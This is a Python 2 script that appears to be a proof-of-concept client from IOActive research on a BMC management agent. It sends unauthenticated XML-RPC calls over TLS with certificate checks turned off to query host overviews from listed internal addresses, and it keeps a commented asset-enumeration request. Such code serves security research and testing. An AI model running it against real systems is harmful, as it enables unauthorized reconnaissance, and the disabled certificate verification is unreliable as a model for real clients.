import gzip
import io
import socket
import ssl
import StringIO
import struct
#https://www.troopers.de/media/filer_public/e2/91/e291748f-7b83-48c4-95b7-3d0cdaab6456/one_tool_to_rule_them_all-and_what_can_it_lead_to.pdf
# Hosts to query, one "ip:port" string per entry.
TARGETS = [
    "192.168.10.31:4750",
    "192.168.10.32:4750",
]

# XML-RPC body of the first call made on a fresh connection
# (RemoteServer.intro); the four positional params are reproduced verbatim.
INITIATOR = "\n".join([
    '<?xml version="1.0" encoding="UTF-8"?>',
    '<methodCall>',
    ' <methodName>RemoteServer.intro</methodName>',
    ' <params>',
    ' <param><value>1</value></param>',
    ' <param><value>2</value></param>',
    ' <param><value>0;0;b;IOActive...;2;CM;-;-;0;-;1;1;b;IOActive...;CP1252;</value></param>',
    ' <param><value>8</value></param>',
    ' </params>',
    '</methodCall>',
])

# XML-RPC body for RemoteServer.getHostOverview (no parameters).
GetHostOverview = "\n".join([
    '<?xml version="1.0" encoding="UTF-8"?>',
    '<methodCall>',
    ' <methodName>RemoteServer.getHostOverview</methodName>',
    '</methodCall>',
])

# Unused request body kept for reference (DAAL.getAssetChildrenStream);
# nothing in this file sends it.
#GetUsers = '<?xml version="1.0" encoding="UTF-8"?>'
#GetUsers += '<methodCall><methodName>DAAL.getAssetChildrenStream</methodName>'
#GetUsers += '<params>'
#GetUsers += '<param>'
#GetUsers += '<value>'
#GetUsers += '<struct>'
#GetUsers += '<member><name>typeName</name><value>BMC_Desktop</value></member>'
#GetUsers += '<member><name>host</name><value>0.0.0.0</value></member>'
#GetUsers += '<member>'
#GetUsers += '<name>container</name>'
#GetUsers += '<value><array><data><value><struct>'
#GetUsers += '<member><name>string</name><value>IS_LIVE</value></member>'
#GetUsers += '<member><name>value</name><value><struct><member><name>longValue</name>'
#GetUsers += '<value><ex:i8>1</ex:i8></value></member><member><name>kind</name><value>'
#GetUsers += '<i4>1</i4></value></member></struct></value></member></struct></value>'
#GetUsers += '</data></array></value></member><member><name>path</name>'
#GetUsers += '<value>/</value></member></struct></value></param>'
#GetUsers += '<param><value><i4>1</i4></value></param>'
#GetUsers += '<param><value><array><data/></array></value></param>'
#GetUsers += '<param><value><array><data/></array></value></param>'
#GetUsers += '<param><value><array><data/></array></value></param>'
#GetUsers += '</params>'
#GetUsers += '</methodCall>'
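def create_request(ip, port, payload):
    """Build a raw HTTP/1.1 POST to /xmlrpc carrying *payload* as its body.

    Args:
        ip: host name or address placed in the Host header.
        port: port placed in the Host header; accepts a str or an int.
        payload: the serialised XML-RPC request body.

    Returns:
        The complete request text: status line, headers, blank line, body.
    """
    header_lines = [
        'POST /xmlrpc HTTP/1.1',
        # %s accepts both the str port TARGETS yields and a plain int.
        'Host: %s:%s' % (ip, port),
        'User-Agent: IOActive',
        'Content-Type: text/xml',
        # Content-Length must be a byte count; payload is expected to be a
        # byte string (Python 2 str), for which len() is exactly that.
        'Content-Length: %d' % len(payload),
        '',
        '',
    ]
    # The two trailing empty entries yield the header-terminating CRLF CRLF.
    return '\r\n'.join(header_lines) + payload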
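def send_netsh_data(sock, data):
    """Send *data* framed with the 4-byte big-endian length prefix this client uses.

    Args:
        sock: a connected socket (the TLS-wrapped one in this file).
        data: request bytes; a text value is UTF-8 encoded first.

    Raises:
        struct.error: if len(data) does not fit in an unsigned 32-bit field.
    """
    # bytes is an alias of str on Python 2, so only unicode/py3-str is encoded.
    if not isinstance(data, bytes):
        data = data.encode("utf-8")
    frame = struct.pack(">I", len(data)) + data
    # sendall() keeps writing until the whole frame is out; send() may return
    # after a partial write and silently truncate the message.
    sock.sendall(frame)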
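def _content_length(headers):
    """Return the integer Content-Length from raw header bytes, or None if absent/invalid."""
    for line in headers.split(b"\r\n"):
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            try:
                return int(value.strip())
            except ValueError:
                return None
    return None


def recv_xmlrpc_data(sock):
    """Read one HTTP response from *sock* and return its gzip-decompressed body.

    Args:
        sock: the connected (TLS-wrapped) socket the request was sent on.

    Returns:
        The decompressed response body as bytes.

    Raises:
        ValueError: if the data read contains no HTTP header terminator.
        IOError: if the body is not a gzip stream.
    """
    data = sock.recv(0x2000)
    print("- Received data")
    separator = b"\r\n\r\n"
    if separator not in data:
        raise ValueError("malformed response: no HTTP header terminator found")
    # maxsplit=1: a compressed body may itself contain CRLF CRLF, and an
    # unbounded split would then drop everything after it.
    headers, payload = data.split(separator, 1)
    # A single recv() is not guaranteed to return the whole body; when the
    # server states Content-Length, keep reading until it is satisfied.
    # Without that header the first chunk is used as-is, as before.
    expected = _content_length(headers)
    while expected is not None and len(payload) < expected:
        chunk = sock.recv(0x2000)
        if not chunk:
            break
        payload += chunk
    # The context manager closes the GzipFile once the body has been read.
    with gzip.GzipFile(fileobj=io.BytesIO(payload), mode='rb') as decompressed:
        return decompressed.read()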
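def send_xmlrpc(ip, port):
    """Open a TLS session to ip:port, issue the intro and getHostOverview calls, and print both replies.

    Args:
        ip: server address.
        port: server port; str (as TARGETS yields) or int.

    Raises:
        socket.error, ssl.SSLError: on connect, handshake or transfer failure.
        ValueError, IOError: propagated from recv_xmlrpc_data on a malformed reply.
    """
    s = socket.socket()
    s.settimeout(10)
    wrapped = None
    try:
        s.connect((ip, int(port)))
        # Initial plain-text packet which triggers the XML-RPC exchange.
        s.sendall(b"TLSRPC")
        # NOTE(review): cert_reqs=CERT_NONE means the peer's certificate is
        # never checked, so this client cannot distinguish the real server
        # from an interposed one; PROTOCOL_TLSv1 pins a legacy protocol
        # version. Both are left unchanged because the server's requirements
        # are not known from this file — confirm before relying on the
        # confidentiality of anything sent here.
        wrapped = ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1, ciphers=None)
        send_netsh_data(wrapped, create_request(ip, port, INITIATOR))
        print("+ Initiator response:")
        print(recv_xmlrpc_data(wrapped))
        send_netsh_data(wrapped, create_request(ip, port, GetHostOverview))
        print(recv_xmlrpc_data(wrapped))
    finally:
        # Close whichever layer exists so a failed connect or handshake
        # does not leak the file descriptor.
        if wrapped is not None:
            wrapped.close()
        else:
            s.close()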
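def test():
    """Query every entry of TARGETS in turn, reporting failures without stopping the sweep."""
    for target in TARGETS:
        # rsplit on the last ':' so a host part that contains ':' stays intact.
        ip, port = target.rsplit(":", 1)
        try:
            send_xmlrpc(ip, port)
        except Exception as e:
            # Deliberate best-effort loop: one unreachable host must not abort
            # the others. str(e) is portable, unlike the removed e.message.
            print("- %s: %s" % (target, e))


if __name__ == "__main__":
    test()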